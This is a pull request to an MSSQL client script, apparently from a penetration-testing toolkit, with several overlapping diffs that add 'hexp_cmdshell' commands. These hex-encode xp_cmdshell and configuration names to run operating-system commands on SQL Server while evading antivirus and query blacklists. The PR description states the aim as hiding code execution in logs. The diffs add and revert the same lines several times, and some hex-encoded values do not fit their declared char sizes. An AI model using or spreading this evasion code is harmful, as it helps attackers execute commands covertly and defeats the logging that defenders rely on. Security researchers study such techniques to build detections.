### PR TITLE
Hex Encoded xp_cmdshell (aka HexP_cmdshell)

### DIFF
--- a/examples/mssqlclient.py
+++ b/examples/mssqlclient.py
@@ -44,9 +44,6 @@ if __name__ == '__main__':
      exit                       - terminates the server process (and this session)
      enable_xp_cmdshell         - you know what it means
      disable_xp_cmdshell        - you know what it means
-     enable_hexp_cmdshell	- enable xp_cmdshell using hex encoding to bypass AV/SQL query blacklisting
-     disable_hexp_cmdshell	- disables xp_cmdshell using hex encoding to bypass AV/SQL query blacklisting
-     hexp_cmdshell {cmd}	- executes cmd using hex encoded xp_cmdshell
      xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
      sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
      ! {cmd}                    - executes a local shell cmd

--- a/examples/mssqlclient.py
+++ b/examples/mssqlclient.py
@@ -44,10 +44,10 @@ if __name__ == '__main__':
      exit                       - terminates the server process (and this session)
      enable_xp_cmdshell         - you know what it means
      disable_xp_cmdshell        - you know what it means
+     enable_hexp_cmdshell	- enable xp_cmdshell using hex encoding to bypass AV/SQL query blacklisting
+     disable_hexp_cmdshell	- disables xp_cmdshell using hex encoding to bypass AV/SQL query blacklisting
+     hexp_cmdshell {cmd}	- executes cmd using hex encoded xp_cmdshell
      xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
-     enable_hexp_cmdshell	    - enabled xp_cmdshell using hex encoding to bypass AV/SQL query blacklisting
-     disable_hexp_cmdshell	    - disables xp_cmdshell using hex encoding to bypass AV/SQL query blacklisting
-     hexp_cmdshell {cmd}	    - executes cmd using hex encoded xp_cmdshell
      sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
      ! {cmd}                    - executes a local shell cmd
      """) 
@@ -64,7 +64,7 @@ if __name__ == '__main__':
             except:
                 pass
 
-        def do_HexP_cmdshell(self, s):
+        def do_hexp_cmdshell(self, s):
             try:
                 self.sql.sql_query("DECLARE @x char(11); SET @x=0x78705f636d647368656c6c; EXEC @x + 'll ' + '%s'" % s)
                 self.sql.printReplies()
@@ -98,13 +98,12 @@ if __name__ == '__main__':
             try:
                 self.sql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;"
                                    "exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
-                print('Normal xp_cmdshell used')
                 self.sql.printReplies()
                 self.sql.printRows()
             except:
                 pass
 
-        def do_enable_HexP_cmdshell(self, line):
+        def do_enable_hexp_cmdshell(self, line):
             try:
                 self.sql.sql_query("DECLARE @d char(9); SET @d=0x73686f7720616476616e636564206f7074696f6e73; EXEC sp_configure @d, 1; RECONFIGURE; DECLARE @x char(9); SET @x=0x78705f636d647368656c6c; EXEC sp_configure @x, 1; RECONFIGURE;")
                 self.sql.printReplies()
@@ -120,8 +119,7 @@ if __name__ == '__main__':
                 self.sql.printRows()
             except:
                 pass
-            
-        def do_disable_HexP_cmdshell(self, line):
+        def do_disable_hexp_cmdshell(self, line):
             try:
                 self.sql.sql_query("DECLARE @d char(9); SET @d=0x73686f7720616476616e636564206f7074696f6e73; EXEC sp_configure @d, 0; RECONFIGURE; DECLARE @x char(9); SET @x=0x78705f636d647368656c6c; EXEC sp_configure @x, 0; RECONFIGURE;")
                 self.sql.printReplies()

--- a/examples/mssqlclient.py
+++ b/examples/mssqlclient.py
@@ -44,29 +44,17 @@ if __name__ == '__main__':
      exit                       - terminates the server process (and this session)
      enable_xp_cmdshell         - you know what it means
      disable_xp_cmdshell        - you know what it means
-     enable_hexp_cmdshell	- enable xp_cmdshell using hex encoding to bypass AV/SQL query blacklisting
-     disable_hexp_cmdshell	- disables xp_cmdshell using hex encoding to bypass AV/SQL query blacklisting
-     hexp_cmdshell {cmd}	- executes cmd using hex encoded xp_cmdshell
      xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
      sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
      ! {cmd}                    - executes a local shell cmd
-     """) 
+     """)
 
         def do_shell(self, s):
             os.system(s)
 
         def do_xp_cmdshell(self, s):
             try:
-                self.sql.sql_query("exec master..xp_cmdshell '%s'" % s)
-                self.sql.printReplies()
-                self.sql.colMeta[0]['TypeData'] = 80*2
-                self.sql.printRows()
-            except:
-                pass
-
-        def do_hexp_cmdshell(self, s):
-            try:
-                self.sql.sql_query("DECLARE @x char(11); SET @x=0x78705f636d647368656c6c; EXEC @x + 'll ' + '%s'" % s)
+                self.sql.sql_query("DECLARE @x char(11); SET @x=0x78705f636d647368656c6c" + "; DECLARE @z char(184); SET @z=0x" + s.encode('utf-8').hex() + ";EXEC @x " + "@z")
                 self.sql.printReplies()
                 self.sql.colMeta[0]['TypeData'] = 80*2
                 self.sql.printRows()
@@ -93,40 +81,23 @@ if __name__ == '__main__':
                 print(os.getcwd())
             else:
                 os.chdir(s)
-    
-        def do_enable_xp_cmdshell(self, line):
-            try:
-                self.sql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;"
-                                   "exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
-                self.sql.printReplies()
-                self.sql.printRows()
-            except:
-                pass
 
-        def do_enable_hexp_cmdshell(self, line):
+        def do_enable_xp_cmdshell(self, line):
             try:
                 self.sql.sql_query("DECLARE @d char(9); SET @d=0x73686f7720616476616e636564206f7074696f6e73; EXEC sp_configure @d, 1; RECONFIGURE; DECLARE @x char(9); SET @x=0x78705f636d647368656c6c; EXEC sp_configure @x, 1; RECONFIGURE;")
                 self.sql.printReplies()
                 self.sql.printRows()
             except:
                 pass
-        
+
         def do_disable_xp_cmdshell(self, line):
             try:
-                self.sql.sql_query("exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure "
-                                   "'show advanced options', 0 ;RECONFIGURE;")
+                self.sql.sql_query("DECLARE @b char(9); SET @b=0x73686f7720616476616e636564206f7074696f6e73; EXEC sp_configure @b, 1; RECONFIGURE; DECLARE @r char(11); SET @r=0x78705f636d647368656c6c; EXEC sp_configure @r, 0; RECONFIGURE;")
                 self.sql.printReplies()
                 self.sql.printRows()
             except:
                 pass
-        def do_disable_hexp_cmdshell(self, line):
-            try:
-                self.sql.sql_query("DECLARE @d char(9); SET @d=0x73686f7720616476616e636564206f7074696f6e73; EXEC sp_configure @d, 0; RECONFIGURE; DECLARE @x char(9); SET @x=0x78705f636d647368656c6c; EXEC sp_configure @x, 0; RECONFIGURE;")
-                self.sql.printReplies()
-                self.sql.printRows()
-            except:
-                pass
-        
+
         def default(self, line):
             try:
                 self.sql.sql_query(line)
@@ -134,7 +105,7 @@ if __name__ == '__main__':
                 self.sql.printRows()
             except:
                 pass
-         
+
         def emptyline(self):
             pass
 
@@ -170,7 +141,7 @@ if __name__ == '__main__':
     if len(sys.argv)==1:
         parser.print_help()
         sys.exit(1)
- 
+
     options = parser.parse_args()
 
     if options.debug is True:

--- a/examples/mssqlclient.py
+++ b/examples/mssqlclient.py
@@ -44,6 +44,9 @@ if __name__ == '__main__':
      exit                       - terminates the server process (and this session)
      enable_xp_cmdshell         - you know what it means
      disable_xp_cmdshell        - you know what it means
+     enable_hexp_cmdshell	- enable xp_cmdshell using hex encoding to bypass AV/SQL query blacklisting
+     disable_hexp_cmdshell	- disables xp_cmdshell using hex encoding to bypass AV/SQL query blacklisting
+     hexp_cmdshell {cmd}	- executes cmd using hex encoded xp_cmdshell
      xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
      sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
      ! {cmd}                    - executes a local shell cmd
@@ -92,7 +95,7 @@ if __name__ == '__main__':
 
         def do_disable_xp_cmdshell(self, line):
             try:
-                self.sql.sql_query("DECLARE @b char(9); SET @b=0x73686f7720616476616e636564206f7074696f6e73; EXEC sp_configure @b, 1; RECONFIGURE; DECLARE @r char(11); SET @r=0x78705f636d647368656c6c; EXEC sp_configure @r, 0; RECONFIGURE;")
+                self.sql.sql_query("DECLARE @r char(11); SET @r=0x78705f636d647368656c6c; EXEC sp_configure @r, 0; RECONFIGURE; DECLARE @b char(9); SET @b=0x73686f7720616476616e636564206f7074696f6e73; EXEC sp_configure @b, 0; RECONFIGURE;")
                 self.sql.printReplies()
                 self.sql.printRows()
             except:

--- a/examples/mssqlclient.py
+++ b/examples/mssqlclient.py
@@ -45,6 +45,9 @@ if __name__ == '__main__':
      enable_xp_cmdshell         - you know what it means
      disable_xp_cmdshell        - you know what it means
      xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
+     enable_hexp_cmdshell	    - enabled xp_cmdshell using hex encoding to bypass AV/SQL query blacklisting
+     disable_hexp_cmdshell	    - disables xp_cmdshell using hex encoding to bypass AV/SQL query blacklisting
+     hexp_cmdshell {cmd}	    - executes cmd using hex encoded xp_cmdshell
      sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
      ! {cmd}                    - executes a local shell cmd
      """) 
@@ -61,7 +64,16 @@ if __name__ == '__main__':
             except:
                 pass
 
-        def do_sp_start_job(self, s):
+        def do_HexP_cmdshell(self, s):
+            try:
+                self.sql.sql_query("DECLARE @x char(11); SET @x=0x78705f636d647368656c6c; EXEC @x + 'll ' + '%s'" % s)
+                self.sql.printReplies()
+                self.sql.colMeta[0]['TypeData'] = 80*2
+                self.sql.printRows()
+            except:
+                pass
+
+        def sp_start_job(self, s):
             try:
                 self.sql.sql_query("DECLARE @job NVARCHAR(100);"
                                    "SET @job='IdxDefrag'+CONVERT(NVARCHAR(36),NEWID());"
@@ -86,11 +98,20 @@ if __name__ == '__main__':
             try:
                 self.sql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;"
                                    "exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
+                print('Normal xp_cmdshell used')
                 self.sql.printReplies()
                 self.sql.printRows()
             except:
                 pass
 
+        def do_enable_HexP_cmdshell(self, line):
+            try:
+                self.sql.sql_query("DECLARE @d char(9); SET @d=0x73686f7720616476616e636564206f7074696f6e73; EXEC sp_configure @d, 1; RECONFIGURE; DECLARE @x char(9); SET @x=0x78705f636d647368656c6c; EXEC sp_configure @x, 1; RECONFIGURE;")
+                self.sql.printReplies()
+                self.sql.printRows()
+            except:
+                pass
+        
         def do_disable_xp_cmdshell(self, line):
             try:
                 self.sql.sql_query("exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure "
@@ -99,7 +120,15 @@ if __name__ == '__main__':
                 self.sql.printRows()
             except:
                 pass
-
+            
+        def do_disable_HexP_cmdshell(self, line):
+            try:
+                self.sql.sql_query("DECLARE @d char(9); SET @d=0x73686f7720616476616e636564206f7074696f6e73; EXEC sp_configure @d, 0; RECONFIGURE; DECLARE @x char(9); SET @x=0x78705f636d647368656c6c; EXEC sp_configure @x, 0; RECONFIGURE;")
+                self.sql.printReplies()
+                self.sql.printRows()
+            except:
+                pass
+        
         def default(self, line):
             try:
                 self.sql.sql_query(line)


### PR DESCRIPTION
Hex encoded version of xp_cmdshell to bypass AV/SQL query blacklisting and hide code execution in logs.

Extra Credit:
@danielprintke - assisted with getting a working version of this code.

